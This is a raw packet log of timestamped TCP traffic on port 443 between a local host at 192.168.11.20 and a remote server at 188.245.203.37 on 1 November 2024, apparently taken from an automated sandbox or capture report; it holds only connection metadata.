Nov 1, 2024 20:57:51.550964117 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550964117 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550976038 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.551012039 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551012039 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551012039 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551060915 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551110983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551110983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551110983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551110983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551141977 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.551208019 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551208019 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551208019 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551258087 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551258087 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551258087 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551307917 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551307917 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551307917 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551307917 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551307917 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551307917 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551403999 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551404953 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551404953 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551436901 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.551501989 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551501989 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551551104 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551551104 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551600933 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551600933 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551600933 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551600933 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551600933 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551628113 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.551630020 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.551631927 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.551650047 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551650047 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551650047 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551703930 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551703930 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551750898 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551801920 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551846027 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551846027 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551893950 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551902056 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.551943064 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551992893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551992893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.551992893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552089930 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552139044 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552139044 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552145004 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.552187920 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552187920 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552237034 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552237034 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552237988 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552237988 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552285910 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552285910 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552285910 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552285910 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552335024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552335024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552335024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552433014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552433014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552433014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552481890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552531958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552531958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552531958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552531958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552531958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552580118 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552580118 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552580118 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552628040 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552678108 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552678108 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552678108 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552678108 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552726984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552726984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552771091 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.552776098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552776098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552778006 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.552874088 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552874088 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552874088 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552923918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552923918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552923918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552923918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552923918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552923918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552963018 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.552973986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552973986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.552973986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553020954 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553070068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553070068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553070068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553168058 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553168058 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553216934 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553216934 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553267002 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553267002 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553267002 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553267002 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553267002 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553316116 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553316116 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553316116 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553411961 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553463936 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553463936 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553514957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553564072 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553613901 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553613901 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553613901 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553613901 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553725958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.553966999 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.553982019 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.554091930 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.554091930 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.554136038 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.554136038 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.554236889 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.554236889 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.554243088 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.554363012 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.562325001 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.562341928 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.562480927 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.562606096 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.562613010 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.562773943 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.569384098 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.569401979 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.569588900 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.569588900 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.569600105 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.569636106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.569636106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.569684029 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.569756031 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577023983 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.577039957 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.577167988 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577167988 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577212095 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577212095 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577212095 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577219963 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.577291012 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577312946 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577313900 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.577389956 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.584266901 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.584285021 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.584393024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.584439993 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.584439993 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.584448099 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.584490061 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.584490061 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.584590912 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.584590912 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.590728998 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.590744972 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.590893984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.590893984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.590939999 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.590939999 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.590939999 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.590948105 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.590991974 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.591041088 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.591089964 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.591089964 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.596786976 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.596803904 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.596913099 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.596914053 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.596959114 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.596959114 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.597059965 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.597067118 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.597121954 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.597198963 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.605010033 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.605027914 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.605149031 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.605222940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.605222940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.605238914 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.605269909 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.605318069 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.605417013 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.615047932 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.615065098 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.615299940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.615299940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.615315914 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.615328074 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.615328074 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.615437984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.615497112 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.618129969 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.618145943 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.618336916 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.618336916 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.618355036 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.618366957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.618367910 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.618367910 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.618418932 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.618491888 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.624428034 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.624444962 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.624598980 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.624706984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.624722958 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.624773026 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.624864101 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.631715059 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.631731033 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.631871939 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.631871939 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.631890059 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.631942987 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.631942987 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.632019997 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.632035971 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.632273912 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.638825893 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.638843060 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.638983965 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.638983965 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.639003038 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.639003038 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.639076948 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.639076948 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.639076948 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.639076948 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.639094114 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.639151096 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.639267921 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.643634081 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.643650055 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.643795967 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.643795967 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.643814087 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.643814087 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.643882990 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.643891096 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.644016027 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.644072056 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.650568008 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.650584936 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.650711060 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.650711060 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.650758028 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.650805950 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.650903940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.650911093 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.651042938 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654488087 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.654505014 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.654678106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654678106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654697895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654697895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654697895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654697895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654697895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654710054 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.654774904 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654798031 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.654882908 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.659636021 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.659652948 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.659806013 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.659806013 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.659828901 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.659881115 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.659926891 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.659933090 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.660109043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.663889885 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.663906097 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.664022923 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.664022923 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.664067030 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.664067030 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.664067030 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.664067030 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.664077997 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.664119005 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.664216042 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.664279938 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.668679953 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.668697119 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.668823957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.668823957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.668876886 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.668876886 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.668972969 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.668979883 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.669116974 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.674530983 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.674546957 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.674695969 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.674695969 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.674742937 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.674742937 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.674750090 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.674791098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.674890995 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.674935102 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.678667068 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.678682089 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.678817034 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.678817034 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.678864002 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.678909063 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.678915024 CET	443	49806	188.245.203.37	192.168.11.20
